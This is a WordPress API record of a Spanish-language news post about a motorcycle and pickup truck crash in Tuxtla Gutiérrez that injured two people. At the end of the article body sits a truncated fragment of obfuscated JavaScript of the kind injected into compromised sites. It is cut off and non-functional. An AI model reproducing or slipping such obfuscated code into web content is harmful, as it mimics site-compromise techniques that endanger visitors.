{"id":24098,"date":"2025-09-19T03:13:47","date_gmt":"2025-09-19T03:13:47","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24098"},"modified":"2025-09-19T03:13:48","modified_gmt":"2025-09-19T03:13:48","slug":"accidente-de-transito-deja-dos-heridos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24098","title":{"rendered":"Accidente de tr\u00e1nsito deja dos heridos"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"24099\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000339628-1024x576.jpg\" alt=\"\" class=\"wp-image-24099\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000339628-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000339628-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000339628-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000339628-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000339628.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" data-id=\"24101\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000339625-576x1024.jpg\" alt=\"\" class=\"wp-image-24101\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000339625-576x1024.jpg 576w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000339625-169x300.jpg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000339625-768x1366.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000339625-864x1536.jpg 864w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000339625.jpg 899w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"24100\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000339631-1024x576.jpg\" alt=\"\" class=\"wp-image-24100\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000339631-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000339631-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000339631-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000339631-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000339631.jpg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 18 de septiembre del 2025. Tuxtla Guti\u00e9rrez.- Un accidente de tr\u00e1nsito ocurrido este mi\u00e9rcoles por la tarde entre una motocicleta y una camioneta particular dej\u00f3 un saldo de dos heridos en Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando los tripulantes de una moto Italika con placas del estado de Chiapas circulaban sobre la Avenida Central y 2a Oriente cuando una camioneta Toyota circulaba de Poniente a Oriente gir\u00f3 hacia la izquierda haciendo corte de circulaci\u00f3n.<\/p>\n\n\n\n<p>La pareja de motociclistas se estrell\u00f3 contra la unidad y terminaron contra el pavimento.<\/p>\n\n\n\n<p>El hombre y la mujer fueron trasladados al hospital del IMSS 5 de Mayo para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de Tr\u00e1nsito Municipal para tomar datos de lo sucedido.<\/p>\n\n\n\n<p>Finalmente una gr\u00faa traslad\u00f3 las unidades al corral\u00f3n en turno para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 18 de septiembre del 2025. Tuxtla Guti\u00e9rrez.- Un accidente de tr\u00e1nsito ocurrido este mi\u00e9rcoles por la tarde entre una motocicleta y una camioneta particular dej\u00f3 un saldo de dos heridos en Tuxtla Guti\u00e9rrez. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando los tripulantes de una moto Italika con placas &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24099,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-24098","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24098","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24098"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24098\/revisions"}],"predecessor-version":[{"id":24102,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24098\/revisions\/24102"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24099"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24098"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24098"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24098"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}